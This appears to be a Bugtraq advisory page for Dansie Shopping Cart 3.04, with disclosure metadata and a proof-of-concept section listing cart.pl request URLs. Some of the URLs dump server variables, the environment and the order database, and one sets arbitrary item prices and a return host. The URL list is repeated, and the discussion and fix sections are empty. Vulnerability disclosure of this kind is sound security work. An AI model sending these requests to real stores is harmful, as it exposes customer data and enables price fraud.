Dansie Shopping Cart 3.04 Multiple Vulnerabilities
BID:1115
Info
Dansie Shopping Cart 3.04 Multiple Vulnerabilities
| Bugtraq ID: | 1115 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | Yes |
| Published: | Apr 14 2000 12:00AM |
| Updated: | Apr 14 2000 12:00AM |
| Credit: | Posted to Bugtraq by tombow <[email protected]> and Randy Janinda <[email protected]>. |
| Vulnerable: |
Dansie Shopping Cart 3.0.4 |
| Not Vulnerable: | |
Discussion
Exploit / POC
Dansie Shopping Cart 3.04 Multiple Vulnerabilities
http://target/cgi-bin/cart.pl?vars
http://target/cgi-bin/cart.pl?env
http://target/cgi-bin/cart.pl?db
http://target/cgi-bin/scripts/cart.pl?name=<Name of item>&price=<Price of product>&sh=<Shipping and handling>&img=<Image file>&return=<Target host>&custom1=<Description of Product>
http://target/cgi-bin/cart.pl?vars
http://target/cgi-bin/cart.pl?env
http://target/cgi-bin/cart.pl?db
http://target/cgi-bin/scripts/cart.pl?name=<Name of item>&price=<Price of product>&sh=<Shipping and handling>&img=<Image file>&return=<Target host>&custom1=<Description of Product>
Solution / Fix
References
Dansie Shopping Cart 3.04 Multiple Vulnerabilities
References:
References:
- Dansie Shopping Cart Product Home Page (Craig Dansie)